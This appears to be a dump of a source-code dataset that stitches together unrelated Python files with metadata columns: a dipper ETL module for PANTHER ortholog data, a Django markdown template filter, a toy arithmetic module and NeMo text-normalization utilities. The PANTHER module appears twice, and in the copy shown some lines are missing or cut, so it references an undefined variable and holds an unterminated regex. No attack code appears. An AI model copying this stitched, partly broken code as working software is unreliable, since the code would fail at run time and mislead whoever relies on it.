# rewrite ENSEMBLGenome:FBgn --> FlyBase:FBgn
geneid = re.sub(r'ENSEMBLGenome:FBgn', 'FlyBase:FBgn', geneid)
# rewrite Gene:<ensembl ids> --> ENSEMBL:<id>
geneid = re.sub(r'Gene:ENS', 'ENSEMBL:ENS', geneid)
# rewrite Gene:<Xenbase ids> --> Xenbase:<id>
geneid = re.sub(r'Gene:Xenbase:', 'Xenbase:', geneid)
# TODO this would be much better done as
# if foo not in curie_map:
# if re.match(r'(Gene|ENSEMBLGenome):', geneid) or \
# re.match(r'Gene_ORFName', geneid) or \
# re.match(r'Gene_Name', geneid):
# # logger.warning(
# #"Found an identifier I don't know how to fix (species %s): %s",
# # sp, geneid)
pfxlcl = re.split(r':', geneid)
pfx = pfxlcl[0]
if pfx is None or pfx not in curie_map.get():
logger.warning("No curie prefix for (species %s): %s", sp, geneid)
geneid = None
return geneid
def getTestSuite(self):
import unittest
from tests.test_panther import PantherTestCase
test_suite = unittest.TestLoader().loadTestsFromTestCase(
PantherTestCase)
return test_suite
| 37.037825
| 79
| 0.544329
|
import tarfile
import re
import logging
from dipper.sources.Source import Source
from dipper.models.assoc.OrthologyAssoc import OrthologyAssoc
from dipper.models.Model import Model
from dipper.models.Dataset import Dataset
from dipper import config
from dipper import curie_map
__author__ = 'nicole'
logger = logging.getLogger(__name__)
class Panther(Source):
PNTHDL = 'ftp://ftp.pantherdb.org/ortholog/current_release'
files = {
'refgenome': {
'file': 'RefGenomeOrthologs.tar.gz',
'url': PNTHDL+'/RefGenomeOrthologs.tar.gz'},
'hcop': {
'file': 'Orthologs_HCOP.tar.gz',
'url': PNTHDL+'/Orthologs_HCOP.tar.gz'}
}
def __init__(self, graph_type, are_bnodes_skolemized, tax_ids=None):
super().__init__(graph_type, are_bnodes_skolemized, 'panther')
self.tax_ids = tax_ids
self.dataset = Dataset(
'panther', 'Protein ANalysis THrough Evolutionary Relationships',
'http://pantherdb.org/', None,
'http://www.pantherdb.org/terms/disclaimer.jsp')
if 'test_ids' not in config.get_config() \
or 'protein' not in config.get_config()['test_ids']:
logger.warning("not configured with gene test ids.")
else:
self.test_ids = config.get_config()['test_ids']['protein']
return
def fetch(self, is_dl_forced=False):
self.get_files(is_dl_forced)
# TODO use the remote timestamp of the file?
return
def parse(self, limit=None):
if self.testOnly:
self.testMode = True
if self.tax_ids is None:
logger.info(
"No taxon filter set; Dumping all orthologous associations.")
else:
logger.info(
"Only the following taxa will be dumped: %s",
str(self.tax_ids))
self._get_orthologs(limit)
return
def _get_orthologs(self, limit):
logger.info("getting orthologs")
if self.testMode:
g = self.testgraph
else:
g = self.graph
model = Model(g)
unprocessed_gene_ids = set()
for k in self.files.keys():
f = '/'.join((self.rawdir, self.files[k]['file']))
matchcounter = 0
mytar = tarfile.open(f, 'r:gz')
# assume that the first entry is the item
fname = mytar.getmembers()[0]
logger.info("Parsing %s", fname.name)
line_counter = 0
with mytar.extractfile(fname) as csvfile:
for line in csvfile:
# skip comment lines
if re.match(r'^
logger.info("Skipping header line")
continue
line_counter += 1
# a little feedback to the user since there's so many
if line_counter % 1000000 == 0:
logger.info(
"Processed %d lines from %s",
line_counter, fname.name)
line = line.decode().strip()
(a, b, orthology_class, ancestor_taxon,
panther_id) = line.split('\t')
(species_a, gene_a, protein_a) = a.split('|')
(species_b, gene_b, protein_b) = b.split('|')
# with the test ids
if self.testMode and not (
re.sub(r'UniProtKB=', '',
protein_a) in self.test_ids or
re.sub(r'UniProtKB=', '', protein_b)
in self.test_ids):
continue
# map the taxon abbreviations to ncbi taxon ids
taxon_a = self._map_taxon_abbr_to_id(species_a)
taxon_b = self._map_taxon_abbr_to_id(species_b)
# ###uncomment the following code block
# if you want to filter based on taxid of favorite animals
# taxids = [9606,10090,10116,7227,7955,6239,8355]
# taxids = [9606] #human only
# retain only those orthologous relationships to genes
# in the specified taxids
# using AND will get you only those associations where
# gene1 AND gene2 are in the taxid list (most-filter)
# using OR will get you any associations where
# gene1 OR gene2 are in the taxid list (some-filter)
if (
self.tax_ids is not None and
(int(re.sub(r'NCBITaxon:', '', taxon_a.rstrip()))
not in self.tax_ids) and
(int(re.sub(
r'NCBITaxon:', '', taxon_b.rstrip())) not in
self.tax_ids)):
continue
else:
matchcounter += 1
if limit is not None and matchcounter > limit:
break
# ### end code block for filtering on taxon
# fix the gene identifiers
gene_a = re.sub(r'=', ':', gene_a)
gene_b = re.sub(r'=', ':', gene_b)
clean_gene = self._clean_up_gene_id(gene_a, species_a)
if clean_gene is None:
unprocessed_gene_ids.add(gene_a)
gene_a = clean_gene
clean_gene = self._clean_up_gene_id(gene_b, species_b)
if clean_gene is None:
unprocessed_gene_ids.add(gene_b)
gene_b = clean_gene
# a special case here; mostly some rat genes
# they use symbols instead of identifiers. will skip
if gene_a is None or gene_b is None:
continue
rel = self._map_orthology_code_to_RO(orthology_class)
evidence_id = 'ECO:0000080' # phylogenetic evidence
# add the association and relevant nodes to graph
assoc = OrthologyAssoc(g, self.name, gene_a, gene_b, rel)
assoc.add_evidence(evidence_id)
# add genes to graph;
# assume labels will be taken care of elsewhere
model.addClassToGraph(gene_a, None)
model.addClassToGraph(gene_b, None)
# might as well add the taxon info for completeness
g.addTriple(
gene_a, model.object_properties['in_taxon'], taxon_a)
g.addTriple(
gene_b, model.object_properties['in_taxon'], taxon_b)
assoc.add_association_to_graph()
# note this is incomplete...
# it won't construct the full family hierarchy,
assoc.add_gene_family_to_graph(
':'.join(('PANTHER', panther_id)))
if not self.testMode \
and limit is not None and line_counter > limit:
break
logger.info("finished processing %s", f)
logger.warning(
"The following gene ids were unable to be processed: %s",
str(unprocessed_gene_ids))
return
@staticmethod
def _map_taxon_abbr_to_id(ptax):
taxid = None
ptax_to_taxid_map = {
'ANOCA': 28377,
'ARATH': 3702,
'BOVIN': 9913,
'CAEEL': 6239,
'CANFA': 9615,
'CHICK': 9031,
'DANRE': 7955,
'DICDI': 44689,
'DROME': 7227,
'ECOLI': 562,
'HORSE': 9796,
'HUMAN': 9606,
'MACMU': 9544,
'MONDO': 13616,
'MOUSE': 10090,
'ORNAN': 9258,
'PANTR': 9598,
'PIG': 9823,
'RAT': 10116,
'SCHPO': 4896,
'TAKRU': 31033,
'XENTR': 8364,
'YEAST': 4932,
}
if ptax in ptax_to_taxid_map:
taxid = ':'.join(('NCBITaxon', str(ptax_to_taxid_map.get(ptax))))
else:
logger.error("unmapped taxon code %s", ptax)
return taxid
@staticmethod
def _map_orthology_code_to_RO(ortho):
ortho_rel = OrthologyAssoc.ortho_rel
ro_id = ortho_rel['orthologous']
ortho_to_ro_map = {
'P': ortho_rel['paralogous'],
'O': ortho_rel['orthologous'],
'LDO': ortho_rel['least_diverged_orthologous'],
'X': ortho_rel['xenologous'],
'LDX': ortho_rel['xenologous']
}
if ortho in ortho_to_ro_map:
ro_id = ortho_to_ro_map.get(ortho)
else:
logger.warning(
"unmapped orthology code %s. Defaulting to 'orthology'", ortho)
return ro_id
@staticmethod
def _clean_up_gene_id(geneid, sp):
geneid = re.sub(r'MGI:MGI:', 'MGI:', geneid)
geneid = re.sub(r'Ensembl', 'ENSEMBL', geneid)
geneid = re.sub(r'Gene:CELE', 'WormBase:', geneid)
if sp == 'CAEEL':
if re.match(r'(Gene|ENSEMBLGenome):\w+\.\d+', geneid):
geneid = re.sub(
r'(?:Gene|ENSEMBLGenome):(\w+\.\d+)',
r'WormBase:\1', geneid)
if sp == 'DROME':
if re.match(r'(ENSEMBLGenome):\w+\.\d+', geneid):
geneid = re.sub(
r'(?:ENSEMBLGenome):(\w+\.\d+)', r'FlyBase:\1', geneid)
geneid = re.sub(r'GeneID', 'NCBIGene', geneid)
geneid = re.sub(r'Gene:Dmel_', 'FlyBase:', geneid)
geneid = re.sub(r'Gene:CG', 'FlyBase:CG', geneid)
geneid = re.sub(r'ENSEMBLGenome:FBgn', 'FlyBase:FBgn', geneid)
geneid = re.sub(r'Gene:ENS', 'ENSEMBL:ENS', geneid)
geneid = re.sub(r'Gene:Xenbase:', 'Xenbase:', geneid)
pfx = pfxlcl[0]
if pfx is None or pfx not in curie_map.get():
logger.warning("No curie prefix for (species %s): %s", sp, geneid)
geneid = None
return geneid
def getTestSuite(self):
import unittest
from tests.test_panther import PantherTestCase
test_suite = unittest.TestLoader().loadTestsFromTestCase(
PantherTestCase)
return test_suite
| true
| true
|
790c96dd4c7bcfd16d5ba09119835c9e3fc6ce48
| 1,006
|
py
|
Python
|
blog/templatetags/markdown_html.py
|
whitecat-22/blog_site
|
21fae0cabacfa206341ec78deefd681f21f2c291
|
[
"MIT"
] | 1
|
2021-08-19T23:56:38.000Z
|
2021-08-19T23:56:38.000Z
|
blog/templatetags/markdown_html.py
|
whitecat-22/blog_site
|
21fae0cabacfa206341ec78deefd681f21f2c291
|
[
"MIT"
] | null | null | null |
blog/templatetags/markdown_html.py
|
whitecat-22/blog_site
|
21fae0cabacfa206341ec78deefd681f21f2c291
|
[
"MIT"
] | null | null | null |
from django import template
from django.utils.safestring import mark_safe
import markdown
from markdownx.utils import markdownify
from markdownx.settings import (
MARKDOWNX_MARKDOWN_EXTENSIONS,
MARKDOWNX_MARKDOWN_EXTENSION_CONFIGS
)
from markdown.extensions import Extension
register = template.Library()
@register.filter
def markdown_to_html(text):
"""マークダウンをhtmlに変換する。"""
return mark_safe(markdownify(text))
class EscapeHtml(Extension):
def extendMarkdown(self, md):
md.preprocessors.deregister('html_block')
md.inlinePatterns.deregister('html')
@register.filter
def markdown_to_html_with_escape(text):
"""マークダウンをhtmlに変換する。
生のHTMLやCSS、JavaScript等のコードをエスケープした上で、マークダウンをHTMLに変換します。
公開しているコメント欄等には、こちらを使ってください。
"""
extensions = MARKDOWNX_MARKDOWN_EXTENSIONS + [EscapeHtml()]
html = markdown.markdown(
text, extensions=extensions,
extension_configs=MARKDOWNX_MARKDOWN_EXTENSION_CONFIGS
)
return mark_safe(html)
| 25.15
| 63
| 0.762425
|
from django import template
from django.utils.safestring import mark_safe
import markdown
from markdownx.utils import markdownify
from markdownx.settings import (
MARKDOWNX_MARKDOWN_EXTENSIONS,
MARKDOWNX_MARKDOWN_EXTENSION_CONFIGS
)
from markdown.extensions import Extension
register = template.Library()
@register.filter
def markdown_to_html(text):
return mark_safe(markdownify(text))
class EscapeHtml(Extension):
def extendMarkdown(self, md):
md.preprocessors.deregister('html_block')
md.inlinePatterns.deregister('html')
@register.filter
def markdown_to_html_with_escape(text):
extensions = MARKDOWNX_MARKDOWN_EXTENSIONS + [EscapeHtml()]
html = markdown.markdown(
text, extensions=extensions,
extension_configs=MARKDOWNX_MARKDOWN_EXTENSION_CONFIGS
)
return mark_safe(html)
| true
| true
|
790c97fefa96c656310b481d8467d21f9c7aefe6
| 279
|
py
|
Python
|
unittest/code.py
|
MahanBi/python-tests
|
b7d8b8a1b6176bd991bd81fdc357203abc6c5288
|
[
"Apache-2.0"
] | null | null | null |
unittest/code.py
|
MahanBi/python-tests
|
b7d8b8a1b6176bd991bd81fdc357203abc6c5288
|
[
"Apache-2.0"
] | null | null | null |
unittest/code.py
|
MahanBi/python-tests
|
b7d8b8a1b6176bd991bd81fdc357203abc6c5288
|
[
"Apache-2.0"
] | null | null | null |
def add(a: int, b: int) -> int:
return a + b
def subtract(a: int, b: int) -> int:
return a - b
def multiply(a: int, b: int or str) -> int:
return a * b
"""
...
----------------------------------------------------------------------
Ran 3 tests in 0.000s
OK
"""
| 13.95
| 70
| 0.387097
|
def add(a: int, b: int) -> int:
return a + b
def subtract(a: int, b: int) -> int:
return a - b
def multiply(a: int, b: int or str) -> int:
return a * b
| true
| true
|
790c981f4cc854524f7a2a7c9050b86f4e6f0725
| 2,453
|
py
|
Python
|
nemo/collections/nlp/data/text_normalization/utils.py
|
JMichaelStringer/NeMo
|
b5b29a69ccb0ec3d8c9ace2f33872ee99858a559
|
[
"Apache-2.0"
] | 1
|
2021-09-10T10:40:51.000Z
|
2021-09-10T10:40:51.000Z
|
nemo/collections/nlp/data/text_normalization/utils.py
|
JMichaelStringer/NeMo
|
b5b29a69ccb0ec3d8c9ace2f33872ee99858a559
|
[
"Apache-2.0"
] | null | null | null |
nemo/collections/nlp/data/text_normalization/utils.py
|
JMichaelStringer/NeMo
|
b5b29a69ccb0ec3d8c9ace2f33872ee99858a559
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import string
from copy import deepcopy
from nltk import word_tokenize
from tqdm import tqdm
import nemo.collections.nlp.data.text_normalization.constants as constants
__all__ = ['read_data_file', 'normalize_str']
def read_data_file(fp):
""" Reading the raw data from a file of NeMo format
For more info about the data format, refer to the
`text_normalization doc <https://github.com/NVIDIA/NeMo/blob/main/docs/source/nlp/text_normalization.rst>`.
"""
insts, w_words, s_words, classes = [], [], [], []
# Read input file
with open(fp, 'r', encoding='utf-8') as f:
for line in tqdm(f):
es = [e.strip() for e in line.strip().split('\t')]
if es[0] == '<eos>':
inst = (deepcopy(classes), deepcopy(w_words), deepcopy(s_words))
insts.append(inst)
# Reset
w_words, s_words, classes = [], [], []
else:
classes.append(es[0])
w_words.append(es[1])
s_words.append(es[2])
return insts
def normalize_str(input_str, lang):
""" Normalize an input string """
input_str_tokens = basic_tokenize(input_str.strip().lower(), lang)
input_str = ' '.join(input_str_tokens)
input_str = input_str.replace(' ', ' ')
return input_str
def remove_puncts(input_str):
""" Remove punctuations from an input string """
return input_str.translate(str.maketrans('', '', string.punctuation))
def basic_tokenize(input_str, lang):
"""
The function is used to do some basic tokenization
Args:
input_str: The input string
lang: Language of the input string
Return: a list of tokens of the input string
"""
if lang == constants.ENGLISH:
return word_tokenize(input_str)
return input_str.strip().split(' ')
| 34.069444
| 111
| 0.6596
|
import string
from copy import deepcopy
from nltk import word_tokenize
from tqdm import tqdm
import nemo.collections.nlp.data.text_normalization.constants as constants
__all__ = ['read_data_file', 'normalize_str']
def read_data_file(fp):
insts, w_words, s_words, classes = [], [], [], []
with open(fp, 'r', encoding='utf-8') as f:
for line in tqdm(f):
es = [e.strip() for e in line.strip().split('\t')]
if es[0] == '<eos>':
inst = (deepcopy(classes), deepcopy(w_words), deepcopy(s_words))
insts.append(inst)
w_words, s_words, classes = [], [], []
else:
classes.append(es[0])
w_words.append(es[1])
s_words.append(es[2])
return insts
def normalize_str(input_str, lang):
input_str_tokens = basic_tokenize(input_str.strip().lower(), lang)
input_str = ' '.join(input_str_tokens)
input_str = input_str.replace(' ', ' ')
return input_str
def remove_puncts(input_str):
return input_str.translate(str.maketrans('', '', string.punctuation))
def basic_tokenize(input_str, lang):
if lang == constants.ENGLISH:
return word_tokenize(input_str)
return input_str.strip().split(' ')
| true
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.